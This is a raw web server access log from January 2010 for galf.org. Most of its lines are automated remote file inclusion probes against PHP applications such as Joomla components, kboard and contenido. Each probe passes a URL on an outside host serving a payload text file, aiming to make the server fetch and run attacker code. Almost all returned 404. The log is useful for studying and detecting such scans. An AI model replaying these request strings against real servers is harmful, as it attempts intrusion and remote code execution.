91.142.214.201 - - [03/Jan/2010:22:52:11 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.westchesterinvisalign.com/icon/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.142.214.201 - - [03/Jan/2010:22:52:11 -0800] "GET /logs/access_090525.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.westchesterinvisalign.com/icon/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.142.214.201 - - [03/Jan/2010:22:53:10 -0800] "GET /logs/access_091130.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.westchesterinvisalign.com/icon/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.122.19.24 - - [03/Jan/2010:22:54:04 -0800] "GET /logs/access_090824.log//admin/business_inc/saveserver.php?thisdir=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
202.122.19.24 - - [03/Jan/2010:22:54:06 -0800] "GET /admin/business_inc/saveserver.php?thisdir=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
202.122.19.24 - - [03/Jan/2010:22:54:06 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
95.25.186.172 - - [03/Jan/2010:22:54:13 -0800] "GET /logs/access_090608.log HTTP/1.0" 404 - "http://megaworld.my1.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
202.122.19.24 - - [03/Jan/2010:22:54:29 -0800] "GET /admin/business_inc/saveserver.php?thisdir=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
202.122.19.24 - - [03/Jan/2010:22:54:57 -0800] "GET /logs/access_090907.log//admin/business_inc/saveserver.php?thisdir=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
202.122.19.24 - - [03/Jan/2010:22:59:41 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
202.122.19.24 - - [03/Jan/2010:23:01:45 -0800] "GET /logs/access_091102.log//modules/xfsection/modify.php?dir_module=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
202.122.19.24 - - [03/Jan/2010:23:01:47 -0800] "GET /modules/xfsection/modify.php?dir_module=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
202.122.19.24 - - [03/Jan/2010:23:01:47 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
202.122.19.24 - - [03/Jan/2010:23:02:16 -0800] "GET /logs/access_091228.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
202.122.19.24 - - [03/Jan/2010:23:02:22 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
202.122.19.24 - - [03/Jan/2010:23:02:23 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
87.250.252.242 - - [03/Jan/2010:23:02:57 -0800] "GET /logs/access_090810.log HTTP/1.1" 200 65536 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.galf.org"
77.87.192.182 - - [03/Jan/2010:23:06:16 -0800] "GET /home//conlib/local.php?cfg[path][contenido]=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.87.192.182 - - [03/Jan/2010:23:06:16 -0800] "GET /logs/access_091207.log/home//conlib/local.php?cfg[path][contenido]=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.87.192.182 - - [03/Jan/2010:23:06:16 -0800] "GET /logs/home//conlib/local.php?cfg[path][contenido]=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.87.192.182 - - [03/Jan/2010:23:06:34 -0800] "GET /logs/access_091123.log/home//conlib/local.php?cfg[path][contenido]=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.122.19.24 - - [03/Jan/2010:23:08:02 -0800] "GET /modules/xfsection/modify.php?dir_module=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.0" 404 - "-" "libwww-perl/5.805" "www.galf.org"
77.87.192.182 - - [03/Jan/2010:23:08:48 -0800] "GET /logs/access_091207.log%20%20/home//conlib/local.php?cfg[path][contenido]=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.87.192.182 - - [03/Jan/2010:23:09:01 -0800] "GET /logs/access_091123.log%20%20/home//conlib/local.php?cfg[path][contenido]=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.122.19.24 - - [03/Jan/2010:23:13:32 -0800] "GET /logs/access_090914.log//modules/xfsection/modify.php?dir_module=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
71.250.232.26 - - [03/Jan/2010:23:25:58 -0800] "GET /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.250.232.26 - - [03/Jan/2010:23:25:58 -0800] "GET /logs//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.250.232.26 - - [03/Jan/2010:23:26:28 -0800] "GET /logs/access_091214.log//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.250.232.26 - - [03/Jan/2010:23:27:07 -0800] "GET /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.250.232.26 - - [03/Jan/2010:23:27:08 -0800] "GET /logs//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.250.232.26 - - [03/Jan/2010:23:27:08 -0800] "GET /logs/access_091214.log%20%20//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.250.232.26 - - [03/Jan/2010:23:30:58 -0800] "GET /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.250.232.26 - - [03/Jan/2010:23:30:58 -0800] "GET /logs//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.250.232.26 - - [03/Jan/2010:23:30:58 -0800] "GET /logs/access_091214.log//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [03/Jan/2010:23:33:25 -0800] "GET /index.php?oldal=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [03/Jan/2010:23:33:25 -0800] "GET /logs/index.php?oldal=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [03/Jan/2010:23:33:25 -0800] "GET /logs/access_091221.log%20%20/index.php?oldal=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [03/Jan/2010:23:33:43 -0800] "GET /logs/index.php?oldal=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [03/Jan/2010:23:33:43 -0800] "GET /logs/access_091221.log%20%20/index.php?oldal=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [03/Jan/2010:23:33:43 -0800] "GET /index.php?oldal=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.250.232.26 - - [03/Jan/2010:23:34:02 -0800] "GET /logs/access.log//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
71.250.232.26 - - [03/Jan/2010:23:34:02 -0800] "GET /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
71.250.232.26 - - [03/Jan/2010:23:34:02 -0800] "GET /logs//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
71.250.232.26 - - [03/Jan/2010:23:35:47 -0800] "GET /logs/access.log%20%20//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
71.250.232.26 - - [03/Jan/2010:23:35:48 -0800] "GET /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
71.250.232.26 - - [03/Jan/2010:23:35:48 -0800] "GET /logs//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
71.250.232.26 - - [03/Jan/2010:23:36:38 -0800] "GET /logs/access.log//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
71.250.232.26 - - [03/Jan/2010:23:36:39 -0800] "GET /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
71.250.232.26 - - [03/Jan/2010:23:36:39 -0800] "GET /logs//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
188.93.208.12 - - [03/Jan/2010:23:39:44 -0800] "GET /logs/access_090817.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
188.93.208.12 - - [03/Jan/2010:23:39:44 -0800] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
188.93.208.12 - - [03/Jan/2010:23:39:44 -0800] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
188.93.208.12 - - [03/Jan/2010:23:40:06 -0800] "GET /logs/access_090817.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
188.93.208.12 - - [03/Jan/2010:23:40:06 -0800] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
188.93.208.12 - - [03/Jan/2010:23:40:06 -0800] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.250.232.26 - - [03/Jan/2010:23:43:30 -0800] "GET /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.250.232.26 - - [03/Jan/2010:23:43:30 -0800] "GET /logs//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.250.232.26 - - [03/Jan/2010:23:43:33 -0800] "GET /logs/access.log//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.250.232.26 - - [03/Jan/2010:23:44:39 -0800] "GET /logs//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.250.232.26 - - [03/Jan/2010:23:44:39 -0800] "GET /logs/access_090831.log//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.250.232.26 - - [03/Jan/2010:23:44:39 -0800] "GET /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [03/Jan/2010:23:49:17 -0800] "GET /logs/access_091012.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://cemerlangclean.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [03/Jan/2010:23:49:17 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://cemerlangclean.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [03/Jan/2010:23:49:17 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://cemerlangclean.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
188.93.208.12 - - [03/Jan/2010:23:50:18 -0800] "GET /logs/access_090928.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
188.93.208.12 - - [03/Jan/2010:23:51:38 -0800] "GET /logs/access_090720.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.80.193.44 - - [03/Jan/2010:23:52:05 -0800] "GET / HTTP/1.0" 200 1032 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; {C4C87E95-D317-C72E-40D4-FE979E736EB0}; .NET CLR 1.1.4322)" "galf.org"
67.19.194.26 - - [03/Jan/2010:23:52:11 -0800] "GET /logs/main.php?pagina=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.19.194.26 - - [03/Jan/2010:23:52:11 -0800] "GET /main.php?pagina=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.19.194.26 - - [03/Jan/2010:23:52:11 -0800] "GET /logs/access.log%20%20/main.php?pagina=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.19.194.26 - - [03/Jan/2010:23:52:53 -0800] "GET /logs/access.log%20%20/main.php?pagina=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.19.194.26 - - [03/Jan/2010:23:52:53 -0800] "GET /logs/main.php?pagina=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.19.194.26 - - [03/Jan/2010:23:52:53 -0800] "GET /main.php?pagina=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
188.93.208.12 - - [03/Jan/2010:23:55:36 -0800] "GET /logs/access_090928.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
188.93.208.12 - - [03/Jan/2010:23:56:24 -0800] "GET /logs/access_090720.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [03/Jan/2010:23:56:49 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [03/Jan/2010:23:56:49 -0800] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [03/Jan/2010:23:56:49 -0800] "GET /logs/access_090713.log%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [03/Jan/2010:23:56:54 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [03/Jan/2010:23:56:54 -0800] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [03/Jan/2010:23:56:55 -0800] "GET /logs/access_090713.log%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
188.93.208.12 - - [03/Jan/2010:23:57:03 -0800] "GET /logs/access.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
188.93.208.12 - - [03/Jan/2010:23:57:03 -0800] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
188.93.208.12 - - [03/Jan/2010:23:57:03 -0800] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
188.93.208.12 - - [03/Jan/2010:23:57:28 -0800] "GET /logs/access_091221.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [03/Jan/2010:23:57:38 -0800] "GET /logs/access_090720.log%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [03/Jan/2010:23:57:56 -0800] "GET /logs/access_090720.log%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.14.103.146 - - [04/Jan/2010:00:02:28 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.14.103.146 - - [04/Jan/2010:00:02:28 -0800] "GET /logs/access_090629.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.14.103.146 - - [04/Jan/2010:00:02:28 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.14.103.146 - - [04/Jan/2010:00:02:39 -0800] "GET /logs/access_090907.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.14.103.146 - - [04/Jan/2010:00:02:40 -0800] "GET /logs/access_091228.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
188.93.208.12 - - [04/Jan/2010:00:02:49 -0800] "GET /logs/access.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
188.93.208.12 - - [04/Jan/2010:00:02:49 -0800] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
188.93.208.12 - - [04/Jan/2010:00:02:49 -0800] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
189.14.103.146 - - [04/Jan/2010:00:02:54 -0800] "GET /logs/access_091207.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.14.103.146 - - [04/Jan/2010:00:02:59 -0800] "GET /logs/access_091130.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.14.103.146 - - [04/Jan/2010:00:03:16 -0800] "GET /logs/access_091019.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.14.103.146 - - [04/Jan/2010:00:03:16 -0800] "GET /logs/access_091221.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.14.103.146 - - [04/Jan/2010:00:03:21 -0800] "GET /logs/access_090817.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.14.103.146 - - [04/Jan/2010:00:03:28 -0800] "GET /logs/access_090824.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
188.93.208.12 - - [04/Jan/2010:00:03:29 -0800] "GET /logs/access_091221.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.14.103.146 - - [04/Jan/2010:00:03:37 -0800] "GET /logs/access_091102.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.14.103.146 - - [04/Jan/2010:00:03:50 -0800] "GET /logs/scripts.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.14.103.146 - - [04/Jan/2010:00:04:01 -0800] "GET /logs/access_090921.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.90.213.231 - - [04/Jan/2010:00:04:08 -0800] "GET /logs/access_090629.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.90.213.231 - - [04/Jan/2010:00:04:08 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.90.213.231 - - [04/Jan/2010:00:04:08 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.90.213.231 - - [04/Jan/2010:00:04:13 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.90.213.231 - - [04/Jan/2010:00:04:13 -0800] "GET /logs/access_090629.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.90.213.231 - - [04/Jan/2010:00:04:13 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.90.213.231 - - [04/Jan/2010:00:04:28 -0800] "GET /logs/access_090907.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.90.213.231 - - [04/Jan/2010:00:04:36 -0800] "GET /logs/access_090907.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.90.213.231 - - [04/Jan/2010:00:04:39 -0800] "GET /logs/access_091228.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
